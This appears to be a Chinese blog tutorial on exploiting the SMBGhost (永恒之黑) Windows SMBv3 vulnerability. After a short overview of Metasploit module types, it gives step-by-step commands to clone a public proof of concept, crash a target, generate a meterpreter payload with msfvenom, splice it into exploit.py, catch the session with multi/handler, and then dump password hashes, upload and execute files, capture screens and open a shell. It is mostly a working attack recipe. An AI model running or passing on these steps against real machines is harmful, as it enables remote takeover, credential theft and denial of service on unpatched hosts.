永恒之黑

永恒之黑

metasploit模块简介

Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持

Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码

Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统

Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截


开始(可以多开几个终端进行)

下载poc: git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
解压 unzip SMB。。。

可互相ping一下进行验证
再进入目录下,进行检测:python3 exploit.py -ip 192.168.233.165(目标ip)

若存在该漏洞,目标服务器回蓝屏重启

 

 

 

 

 

 

msfconsole进入msf
进入msf生成木马:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

 

 

进入SMB那个文件夹,找到exploit.py文件

替换POC,将上面生成的代码替换原文中的代码

 

 记得把buf全部替换成poc

 

 

 

(使用exp反弹shell)

启动Metasploit监听
开启MSF:msfconsole
开启监听:use exploit/multi/handler

设置payload:set payload windows/x64/meterpreter/bind_tcp
监听端口: set lport 4444
目标主机: set rhost 192.168.1.143
攻击:run

运行poc,自动建立连接:python3 exploit.py -ip 192.168.233.165

 

 

 

进入后相关命令
查看用户权限: meterpreter> getuid

获取hash密码: meterpreter> hashdump

上传文件: meterpreter> upload

执行文件: meterpreter> execute -f notepad.exe

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

 


简单好用的帮助指令
help/? 帮助菜单
exit 退出MSF控制台
Back 返回上一级
info 显示一个或者多个模块的信息

show 显示所给类型的模块

background 将当前操作在后台运行

use 使用所选择的模块
set 设置选项

unset 取消设置的选项
session 会话

posted @ 2022-10-08 20:26  回忆一下  阅读(148)  评论(1)    收藏  举报